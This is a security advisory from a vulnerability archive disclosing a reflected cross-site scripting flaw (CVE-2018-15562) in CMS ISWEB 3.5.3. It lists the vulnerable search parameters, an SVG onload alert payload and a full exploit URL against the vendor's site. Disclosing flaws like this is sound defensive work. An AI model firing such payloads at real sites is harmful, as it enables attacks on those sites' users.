Lucene search
Thiago SenaPACKETSTORM:149109HistoryAug 28, 2018 - 12:00 a.m.
CMS ISWEB 3.5.3 Cross Site Scripting
2018-08-2800:00:00
Thiago Sena
packetstormsecurity.com
29
EPSS
0.001
Percentile
36.5%
`CMS ISWEB 3.5.3 XSS Reflected
> CVE
CVE-2018-15562
> Parameter vuln:
ordineRis,
sezioneRicerca
oggettiRicerca
> PoC Prints: https://i.imgur.com/5YpESoC.png
> Vendor of Product
http://www.isweb.it
> Attack Type
Remote
> Attack Vectors
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>
> Discoverer
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza
`
Related
cvelist
cvelist
CVE-2018-15562
2018-08-29 19:00:00
cve
cve
CVE-2018-15562
2018-08-29 19:29:00
prion
prion
Code injection
2018-08-29 19:29:00
nvd
nvd
CVE-2018-15562
2018-08-29 19:29:00